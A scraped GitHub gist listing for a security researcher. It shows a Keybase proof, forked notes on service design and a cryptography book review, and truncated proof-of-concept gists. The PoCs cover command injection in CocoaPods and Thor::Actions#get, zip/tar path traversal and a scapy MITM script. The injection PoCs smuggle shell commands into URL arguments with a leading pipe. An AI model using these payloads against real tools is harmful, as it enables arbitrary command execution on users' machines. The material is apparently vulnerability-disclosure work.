Michael Marek ecneladis

View keybase.md

Keybase proof

I hereby claim:

  • I am ecneladis on github.
  • I am ecneladis (https://keybase.io/ecneladis) on keybase.
  • I have a public key ASA-QJvmS7xazTLNCuqXhhaFp8-904eA3dtM89QLwfrY1wo

To claim this, I am signing this object:

View cocoapods.rb
# https://github.com/CocoaPods/CocoaPods/blob/cae98c5386f7d80d6fe065c3f081ce130628151a/lib/cocoapods/command/spec/lint.rb#L100-L107
pod spec lint "|touch /tmp/test;\nhttps://url.co"
View dotzip.go
package main
import (
"archive/zip"
"os"
"log"
)
func main() {
f, err := os.Create("traversal.zip")
View dottar.go
package main
import (
"archive/tar"
"os"
"log"
)
func main() {
f, err := os.Create("traversal.tar")
View sqlmitm.py
from scapy.all import *
import unicodedata
import sys, getopt
import time, datetime
import argparse
import socket
import fcntl
import struct
import threading
ecneladis / service-checklist.md
Created Sep 12, 2016 — forked from acolyer/service-checklist.md
Internet Scale Services Checklist
View service-checklist.md

Internet Scale Services Checklist

A checklist for designing and developing internet scale services, inspired by James Hamilton's 2007 paper "On Designing and Deploying Internet-Scale Services."

Basic tenets

  • Does the design expect failures to happen regularly and handle them gracefully?
  • Have we kept things as simple as possible?
ecneladis / 00-about-search-api-examples.md
Created Aug 12, 2016 — forked from jasonrudolph/00-about-search-api-examples.md
5 entertaining things you can find with the GitHub Search API
View 00-about-search-api-examples.md
ecneladis / gist:6cbe26ebe3f862663ea4f11bef4bb54b
Created Jun 27, 2016 — forked from mikemaccana/gist:10847077
Tptacek's Review of "Practical Cryptography With Go"
View gist:6cbe26ebe3f862663ea4f11bef4bb54b

Wow. I've now read the whole book and much of the supporting code. I'm not a fan, and recommend against relying on it. Here's a laundry list of concerns:

  • The teaching method the book uses is badly flawed. The book's strategy is to start simple and build to complexity, which makes sense if you're teaching algebra but not if you're teaching heart surgery. The result is that each chapter culminates with the implementation of a system that is grievously insecure. Little warning is given of this, apart from allusions to future chapters improving the system. For instance, Chapter 2 closes with a chat system that uses AES-CBC without an authenticator.

  • The book is full of idiosyncratic recommendations. For instance, AES-CBC requires a padding scheme. There is a standard padding scheme. The book purports to present it, but instead of PKCS7, it presents 80h+00h..00h.

  • At one point about 1/3rd of the way through the book, it suggests using a SHA256 hash of the plaintext as an authenticator for a message. Thi

ecneladis / thor_cmd_exec.rb
Created Jan 8, 2016
Code execution in Thor::Actions#get
View thor_cmd_exec.rb
#!/usr/bin/env ruby
require 'thor'
class CLI < Thor
include Thor::Actions
desc "cmd_exec", "cmd_exec poc"
def cmd_exec()
get "|uname -a > cmd_exec_test;\nhttps://gist.github.com", "/tmp/dsadas"